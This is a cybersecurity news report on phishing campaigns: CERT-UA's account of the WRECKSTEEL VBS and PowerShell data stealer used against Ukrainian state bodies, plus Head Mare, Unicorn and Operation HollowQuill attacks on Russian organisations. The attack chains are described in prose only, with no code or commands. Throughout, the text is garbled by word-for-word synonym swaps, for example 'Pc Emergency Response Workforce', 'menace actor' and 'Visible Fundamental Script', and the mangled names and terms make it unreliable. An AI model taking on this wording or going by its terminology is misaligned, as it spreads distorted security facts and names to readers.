The Pc Emergency Response Workforce of Ukraine (CERT-UA) has revealed that at least three cyber assaults have been recorded in opposition to state administration our bodies and significant infrastructure services within the nation with an intention to steal delicate information.
The marketing campaign, the company stated, concerned the usage of compromised e-mail accounts to ship phishing messages containing hyperlinks pointing to respectable providers like DropMeFiles and Google Drive. In some cases, the hyperlinks are embedded inside PDF attachments.
The digital missives sought to induce a false sense of urgency by claiming {that a} Ukrainian authorities company deliberate to chop salaries, urging the recipient to click on on the hyperlink to view the record of affected workers.
Visiting these hyperlinks results in the obtain of a Visible Fundamental Script (VBS) loader that is designed to fetch and execute a PowerShell script able to harvesting information matching a selected set of extensions and capturing screenshots.
The exercise, attributed to a menace cluster tracked as UAC-0219, is claimed to have been ongoing since at the least fall 2024, with early iterations utilizing a mix of EXE binaries, a VBS stealer, and a respectable picture editor software program known as IrfanView to appreciate its objectives.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. The assaults haven’t been attributed to any nation.
The event comes as Kaspersky warned that the menace actor often called Head Mare has focused a number of Russian entities with a malware often called PhantomPyramid that is able to processing directions issued by the operator over a command-and-control (C2) server, in addition to downloading and operating further payloads like MeshAgent.
Russian vitality corporations, industrial enterprises, and suppliers and builders of digital elements organizations have additionally been on the receiving finish of phishing assaults mounted by a menace actor codenamed Unicorn that dropped a VBS trojan designed to siphon information and pictures from contaminated hosts.
Late final month, SEQRITE Labs revealed that educational, governmental, aerospace, and defense-related networks in Russia are being focused by weaponized decoy paperwork, seemingly despatched through phishing emails, as a part of a marketing campaign dubbed Operation HollowQuill. The assaults are believed to have began round December 2024.
The exercise makes use of social engineering ploys, disguising malware-laced PDFs as analysis invites and authorities communiqués to entice unsuspecting customers into triggering the assault chain.
“The menace entity delivers a malicious RAR file which accommodates a .NET malware dropper, which additional drops a Golang-based shellcode loader together with the respectable OneDrive utility and a decoy-based PDF with a ultimate Cobalt Strike payload,” safety researcher Subhajeet Singha stated.
